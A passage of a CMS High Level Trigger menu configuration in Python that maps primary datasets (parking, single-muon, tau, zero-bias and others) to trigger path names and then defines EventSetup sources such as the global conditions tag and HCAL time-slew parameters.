'HLT_Mu10_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT350_PFMETNoMu60_v15',
'HLT_Mu12_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets54MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets62MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePhoton20_v5',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu12_v3',
'HLT_Mu15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Mu15_IsoVVVL_PFHT450_PFMET50_v15',
'HLT_Mu15_IsoVVVL_PFHT450_v15',
'HLT_Mu15_IsoVVVL_PFHT600_v19',
'HLT_Mu15_v3',
'HLT_Mu17_Photon30_IsoCaloId_v6',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_v14',
'HLT_Mu17_TrkIsoVVL_v13',
'HLT_Mu17_v13',
'HLT_Mu18_Mu9_DZ_v4',
'HLT_Mu18_Mu9_SameSign_DZ_v4',
'HLT_Mu18_Mu9_SameSign_v4',
'HLT_Mu18_Mu9_v4',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass3p8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_v3',
'HLT_Mu19_TrkIsoVVL_v4',
'HLT_Mu19_v4',
'HLT_Mu20_Mu10_DZ_v4',
'HLT_Mu20_Mu10_SameSign_DZ_v4',
'HLT_Mu20_Mu10_SameSign_v4',
'HLT_Mu20_Mu10_v4',
'HLT_Mu20_TkMu0_Phi_v8',
'HLT_Mu20_v12',
'HLT_Mu23_Mu12_DZ_v4',
'HLT_Mu23_Mu12_SameSign_DZ_v4',
'HLT_Mu23_Mu12_SameSign_v4',
'HLT_Mu23_Mu12_v4',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu25_TkMu0_Onia_v8',
'HLT_Mu25_TkMu0_Phi_v8',
'HLT_Mu27_Ele37_CaloIdL_MW_v5',
'HLT_Mu27_v13',
'HLT_Mu30_TkMu0_Psi_v1',
'HLT_Mu30_TkMu0_Upsilon_v1',
'HLT_Mu37_Ele27_CaloIdL_MW_v5',
'HLT_Mu37_TkMu27_v5',
'HLT_Mu38NoFiltersNoVtxDisplaced_Photon38_CaloIdL_v1',
'HLT_Mu3_PFJet40_v16',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET100_PFMHT100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET70_PFMHT70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET80_PFMHT80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET90_PFMHT90_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu100_PFMHTNoMu100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu70_PFMHTNoMu70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu80_PFMHTNoMu80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu90_PFMHTNoMu90_IDTight_v2',
'HLT_Mu43NoFiltersNoVtxDisplaced_Photon43_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtx_Photon43_CaloIdL_v5',
'HLT_Mu48NoFiltersNoVtx_Photon48_CaloIdL_v5',
'HLT_Mu4_TrkIsoVVL_DiPFJet90_40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v15',
'HLT_Mu50_IsoVVVL_PFHT450_v15',
'HLT_Mu50_v13',
'HLT_Mu55_v3',
'HLT_Mu7p5_L2Mu2_Jpsi_v10',
'HLT_Mu7p5_L2Mu2_Upsilon_v10',
'HLT_Mu7p5_Track2_Jpsi_v11',
'HLT_Mu7p5_Track2_Upsilon_v11',
'HLT_Mu7p5_Track3p5_Jpsi_v11',
'HLT_Mu7p5_Track3p5_Upsilon_v11',
'HLT_Mu7p5_Track7_Jpsi_v11',
'HLT_Mu7p5_Track7_Upsilon_v11',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_DZ_v18',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_v18',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_DZ_v19',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_v19',
'HLT_Mu8_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v16',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v13',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v11',
'HLT_Mu8_TrkIsoVVL_v12',
'HLT_Mu8_v12',
'HLT_OldMu100_v3',
'HLT_PFHT1050_v18',
'HLT_PFHT180_v17',
'HLT_PFHT250_v17',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_TriplePFBTagDeepCSV_4p5_v3',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_v9',
'HLT_PFHT350MinPFJet15_v9',
'HLT_PFHT350_v19',
'HLT_PFHT370_v17',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_v8',
'HLT_PFHT400_FivePFJet_120_120_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT400_SixPFJet32_v8',
'HLT_PFHT430_v17',
'HLT_PFHT450_SixPFJet36_PFBTagDeepCSV_1p59_v7',
'HLT_PFHT450_SixPFJet36_v7',
'HLT_PFHT500_PFMET100_PFMHT100_IDTight_v12',
'HLT_PFHT500_PFMET110_PFMHT110_IDTight_v12',
'HLT_PFHT510_v17',
'HLT_PFHT590_v17',
'HLT_PFHT680_v17',
'HLT_PFHT700_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT700_PFMET95_PFMHT95_IDTight_v12',
'HLT_PFHT780_v17',
'HLT_PFHT800_PFMET75_PFMHT75_IDTight_v12',
'HLT_PFHT800_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT890_v17',
'HLT_PFJet140_v19',
'HLT_PFJet15_v3',
'HLT_PFJet200_v19',
'HLT_PFJet25_v3',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFJet400_v20',
'HLT_PFJet40_v21',
'HLT_PFJet450_v21',
'HLT_PFJet500_v21',
'HLT_PFJet550_v11',
'HLT_PFJet60_v21',
'HLT_PFJet80_v20',
'HLT_PFJetFwd140_v18',
'HLT_PFJetFwd15_v3',
'HLT_PFJetFwd200_v18',
'HLT_PFJetFwd25_v3',
'HLT_PFJetFwd260_v19',
'HLT_PFJetFwd320_v19',
'HLT_PFJetFwd400_v19',
'HLT_PFJetFwd40_v19',
'HLT_PFJetFwd450_v19',
'HLT_PFJetFwd500_v19',
'HLT_PFJetFwd60_v19',
'HLT_PFJetFwd80_v18',
'HLT_PFMET100_PFMHT100_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMET110_PFMHT110_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET110_PFMHT110_IDTight_v20',
'HLT_PFMET120_PFMHT120_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMET120_PFMHT120_IDTight_v20',
'HLT_PFMET130_PFMHT130_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET140_PFMHT140_IDTight_v20',
'HLT_PFMET200_BeamHaloCleaned_v9',
'HLT_PFMET200_NotCleaned_v9',
'HLT_PFMET250_NotCleaned_v9',
'HLT_PFMET300_NotCleaned_v9',
'HLT_PFMETNoMu100_PFMHTNoMu100_IDTight_PFHT60_v9',
'HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_PFHT60_v9',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMETTypeOne100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne110_PFMHT110_IDTight_v12',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_v12',
'HLT_PFMETTypeOne130_PFMHT130_IDTight_v12',
'HLT_PFMETTypeOne140_PFMHT140_IDTight_v11',
'HLT_PFMETTypeOne200_BeamHaloCleaned_v9',
'HLT_Photon100EBHE10_v2',
'HLT_Photon100EB_TightID_TightIso_v2',
'HLT_Photon100EEHE10_v2',
'HLT_Photon100EE_TightID_TightIso_v2',
'HLT_Photon110EB_TightID_TightIso_v2',
'HLT_Photon120EB_TightID_TightIso_v2',
'HLT_Photon120_R9Id90_HE10_IsoM_v14',
'HLT_Photon120_v13',
'HLT_Photon150_v6',
'HLT_Photon165_R9Id90_HE10_IsoM_v15',
'HLT_Photon175_v14',
'HLT_Photon200_v13',
'HLT_Photon20_HoverELoose_v10',
'HLT_Photon20_v2',
'HLT_Photon300_NoHE_v12',
'HLT_Photon30_HoverELoose_v10',
'HLT_Photon33_v5',
'HLT_Photon35_TwoProngs35_v1',
'HLT_Photon50_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_PFMET50_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_v14',
'HLT_Photon50_v13',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_PFHT350MinPFJet15_v11',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_v5',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_v5')+cms.vstring( 'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ300_PFJetsMJJ400DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ400_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_v14',
'HLT_Photon75_v13',
'HLT_Photon90_CaloIdL_PFHT700_v16',
'HLT_Photon90_R9Id90_HE10_IsoM_v14',
'HLT_Photon90_v13',
'HLT_Physics_v7',
'HLT_QuadPFJet103_88_75_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet103_88_75_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet103_88_75_15_v5',
'HLT_QuadPFJet105_88_76_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet105_88_76_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet105_88_76_15_v5',
'HLT_QuadPFJet111_90_80_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet111_90_80_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet111_90_80_15_v5',
'HLT_QuadPFJet98_83_71_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet98_83_71_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet98_83_71_15_v5',
'HLT_Random_v3',
'HLT_Rsq0p35_v15',
'HLT_Rsq0p40_v15',
'HLT_RsqMR300_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR300_Rsq0p09_MR200_v15',
'HLT_RsqMR320_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR320_Rsq0p09_MR200_v15',
'HLT_SingleJet30_Mu12_SinglePFJet40_v11',
'HLT_SinglePhoton10_Eta3p1ForPPRef_v8',
'HLT_SinglePhoton20_Eta3p1ForPPRef_v9',
'HLT_SinglePhoton30_Eta3p1ForPPRef_v9',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_v4',
'HLT_TkMu100_v2',
'HLT_Trimuon5_3p5_2_Upsilon_Muon_v5',
'HLT_TrimuonOpen_5_3p5_2_Upsilon_Muon_v3',
'HLT_TripleJet110_35_35_Mjj650_PFMET110_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET120_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET130_v9',
'HLT_TripleMu_10_5_5_DZ_v10',
'HLT_TripleMu_12_10_5_v10',
'HLT_TripleMu_5_3_3_Mass3p8_DCA_v3',
'HLT_TripleMu_5_3_3_Mass3p8_DZ_v8',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_R9IdVL_v3',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_v3',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_R9IdVL_v4',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_v4',
'HLT_TriplePhoton_35_35_5_CaloIdLV2_R9IdVL_v4',
'HLT_TrkMu12_DoubleTrkMu5NoFiltersNoVtx_v6',
'HLT_TrkMu16_DoubleTrkMu6NoFiltersNoVtx_v12',
'HLT_TrkMu17_DoubleTrkMu8NoFiltersNoVtx_v13',
'HLT_UncorrectedJetE30_NoBPTX3BX_v6',
'HLT_UncorrectedJetE30_NoBPTX_v6',
'HLT_UncorrectedJetE60_NoBPTX3BX_v6',
'HLT_UncorrectedJetE70_NoBPTX3BX_v6',
'HLT_VBF_DoubleLooseChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleMediumChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleTightChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstBXAfterTrain_v3',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_FirstCollisionInTrain_v4',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_LastCollisionInTrain_v3',
'HLT_ZeroBias_v6') ),
ParkingBPH1 = cms.vstring( 'HLT_Mu12_IP6_part0_v2',
'HLT_Mu7_IP4_part0_v2',
'HLT_Mu8_IP3_part0_v3',
'HLT_Mu8_IP5_part0_v2',
'HLT_Mu8_IP6_part0_v2',
'HLT_Mu9_IP0_part0_v2',
'HLT_Mu9_IP3_part0_v2',
'HLT_Mu9_IP4_part0_v2',
'HLT_Mu9_IP5_part0_v2',
'HLT_Mu9_IP6_part0_v3' ),
ParkingBPH2 = cms.vstring( 'HLT_Mu12_IP6_part1_v2',
'HLT_Mu7_IP4_part1_v2',
'HLT_Mu8_IP3_part1_v3',
'HLT_Mu8_IP5_part1_v2',
'HLT_Mu8_IP6_part1_v2',
'HLT_Mu9_IP4_part1_v2',
'HLT_Mu9_IP5_part1_v2',
'HLT_Mu9_IP6_part1_v3' ),
ParkingBPH3 = cms.vstring( 'HLT_Mu12_IP6_part2_v2',
'HLT_Mu7_IP4_part2_v2',
'HLT_Mu8_IP3_part2_v3',
'HLT_Mu8_IP5_part2_v2',
'HLT_Mu8_IP6_part2_v2',
'HLT_Mu9_IP4_part2_v2',
'HLT_Mu9_IP5_part2_v2',
'HLT_Mu9_IP6_part2_v3' ),
ParkingBPH4 = cms.vstring( 'HLT_Mu12_IP6_part3_v2',
'HLT_Mu7_IP4_part3_v2',
'HLT_Mu8_IP3_part3_v3',
'HLT_Mu8_IP5_part3_v2',
'HLT_Mu8_IP6_part3_v2',
'HLT_Mu9_IP4_part3_v2',
'HLT_Mu9_IP5_part3_v2',
'HLT_Mu9_IP6_part3_v3' ),
ParkingBPH5 = cms.vstring( 'HLT_Mu12_IP6_part4_v2',
'HLT_Mu7_IP4_part4_v2',
'HLT_Mu8_IP3_part4_v3',
'HLT_Mu8_IP5_part4_v2',
'HLT_Mu8_IP6_part4_v2',
'HLT_Mu9_IP4_part4_v2',
'HLT_Mu9_IP5_part4_v2',
'HLT_Mu9_IP6_part4_v3' ),
ParkingBPHPromptCSCS = cms.vstring( 'HLT_Mu12_IP6_ToCSCS_v1',
'HLT_Mu7_IP4_ToCSCS_v1',
'HLT_Mu8_IP3_ToCSCS_v1',
'HLT_Mu8_IP5_ToCSCS_v1',
'HLT_Mu8_IP6_ToCSCS_v1',
'HLT_Mu9_IP4_ToCSCS_v1',
'HLT_Mu9_IP5_ToCSCS_v1',
'HLT_Mu9_IP6_ToCSCS_v1' ),
RPCMonitor = cms.vstring( 'AlCa_RPCMuonNormalisation_v13' ),
ScoutingMonitor = cms.vstring( 'DST_Run3_PFScoutingPixelTracking_v16',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_IsoMu27_v16',
'HLT_Mu50_v13',
'HLT_PFHT1050_v18',
'HLT_Photon200_v13' ),
ScoutingPFRun3 = cms.vstring( 'DST_Run3_PFScoutingPixelTracking_v16' ),
SingleMuon = cms.vstring( 'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTau27_eta2p1_CrossL1_v12',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_CrossL1_v4',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_TwoProngs35_v1',
'HLT_IsoMu24_eta2p1_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_IsoMu30_v4',
'HLT_L1SingleMu18_v3',
'HLT_L1SingleMu25_v2',
'HLT_L2Mu10_v7',
'HLT_L2Mu50_v2',
'HLT_Mu10_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT350_PFMETNoMu60_v15',
'HLT_Mu12_v3',
'HLT_Mu15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Mu15_IsoVVVL_PFHT450_PFMET50_v15',
'HLT_Mu15_IsoVVVL_PFHT450_v15',
'HLT_Mu15_IsoVVVL_PFHT600_v19',
'HLT_Mu15_v3',
'HLT_Mu20_v12',
'HLT_Mu27_v13',
'HLT_Mu3_PFJet40_v16',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET100_PFMHT100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET70_PFMHT70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET80_PFMHT80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET90_PFMHT90_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu100_PFMHTNoMu100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu70_PFMHTNoMu70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu80_PFMHTNoMu80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu90_PFMHTNoMu90_IDTight_v2',
'HLT_Mu4_TrkIsoVVL_DiPFJet90_40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v15',
'HLT_Mu50_IsoVVVL_PFHT450_v15',
'HLT_Mu50_v13',
'HLT_Mu55_v3',
'HLT_Mu8_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v16',
'HLT_OldMu100_v3',
'HLT_TkMu100_v2' ),
Tau = cms.vstring( 'HLT_DoubleMediumChargedIsoPFTau35_Trk1_TightID_eta2p1_Reg_v12',
'HLT_DoubleMediumChargedIsoPFTau35_Trk1_eta2p1_Reg_v12',
'HLT_DoubleMediumChargedIsoPFTauHPS30_L1MaxMass_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v4',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTau35_Trk1_TightID_eta2p1_Reg_v12',
'HLT_DoubleTightChargedIsoPFTau35_Trk1_eta2p1_Reg_v12',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_1pr_v11',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau200HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau220HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET100_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET110_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET120_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET130_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET140_v3',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET90_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_v12',
'HLT_Photon35_TwoProngs35_v1',
'HLT_VBF_DoubleLooseChargedIsoPFTau20_Trk1_eta2p1_v3',
'HLT_VBF_DoubleLooseChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleMediumChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleTightChargedIsoPFTauHPS20_Trk1_eta2p1_v1' ),
TestEnablesEcalHcal = cms.vstring( 'HLT_EcalCalibration_v4',
'HLT_HcalCalibration_v5' ),
TestEnablesEcalHcalDQM = cms.vstring( 'HLT_EcalCalibration_v4',
'HLT_HcalCalibration_v5' ),
ZeroBias = cms.vstring( 'HLT_Random_v3',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstBXAfterTrain_v3',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_FirstCollisionInTrain_v4',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_LastCollisionInTrain_v3',
'HLT_ZeroBias_v6' )
)
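# --- EventSetup configuration -----------------------------------------------
# Everything below this point defines ESSources (conditions and record
# providers) and, further down, ESProducers; these are consumed by the HLT
# modules through the EventSetup system rather than as per-event data.
#
# Illustrative inspection sketch (comments only, not executed): assuming the
# full menu has been loaded into a cms.Process object and the dataset map
# above is reachable as an attribute named 'datasets' (the attribute name is
# an assumption), the paths per primary dataset could be counted with:
#
#   for name, paths in process.datasets.parameters_().items():
#       print(name, len(paths))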
CSCChannelMapperESSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "CSCChannelMapperRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
CSCINdexerESSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "CSCIndexerRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
GlobalParametersRcdSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "L1TGlobalParametersRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
GlobalTag = cms.ESSource( "PoolDBESSource",
DBParameters = cms.PSet(
connectionRetrialTimeOut = cms.untracked.int32( 60 ),
idleConnectionCleanupPeriod = cms.untracked.int32( 10 ),
enableReadOnlySessionOnUpdateConnection = cms.untracked.bool( False ),
enablePoolAutomaticCleanUp = cms.untracked.bool( False ),
messageLevel = cms.untracked.int32( 0 ),
authenticationPath = cms.untracked.string( "." ),
connectionRetrialPeriod = cms.untracked.int32( 10 ),
connectionTimeOut = cms.untracked.int32( 0 ),
enableConnectionSharing = cms.untracked.bool( True )
),
connect = cms.string( "frontier://FrontierProd/CMS_CONDITIONS" ),
globaltag = cms.string( "103X_dataRun2_HLT_v1" ),
snapshotTime = cms.string( "" ),
toGet = cms.VPSet(
),
DumpStat = cms.untracked.bool( False ),
ReconnectEachRun = cms.untracked.bool( False ),
RefreshAlways = cms.untracked.bool( False ),
RefreshEachRun = cms.untracked.bool( False ),
RefreshOpenIOVs = cms.untracked.bool( False ),
pfnPostfix = cms.untracked.string( "None" )
)
HcalTimeSlewEP = cms.ESSource( "HcalTimeSlewEP",
appendToDataLabel = cms.string( "HBHE" ),
timeSlewParametersM2 = cms.VPSet(
cms.PSet( slope = cms.double( -3.178648 ),
tmax = cms.double( 16.0 ),
tzero = cms.double( 23.960177 )
),
cms.PSet( slope = cms.double( -1.5610227 ),
tmax = cms.double( 10.0 ),
tzero = cms.double( 11.977461 )
),
cms.PSet( slope = cms.double( -1.075824 ),
tmax = cms.double( 6.25 ),
tzero = cms.double( 9.109694 )
)
),
timeSlewParametersM3 = cms.VPSet(
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 32.0 ),
tspar0 = cms.double( 15.5 ),
tspar1 = cms.double( -3.2 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
)
)
)
HepPDTESSource = cms.ESSource( "HepPDTESSource",
pdtFileName = cms.FileInPath( "SimGeneral/HepPDTESSource/data/pythiaparticle.tbl" )
)
eegeom = cms.ESSource( "EmptyESSource",
recordName = cms.string( "EcalMappingRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
es_hardcode = cms.ESSource( "HcalHardcodeCalibrations",
fromDDD = cms.untracked.bool( False ),
toGet = cms.untracked.vstring( 'GainWidths' )
)
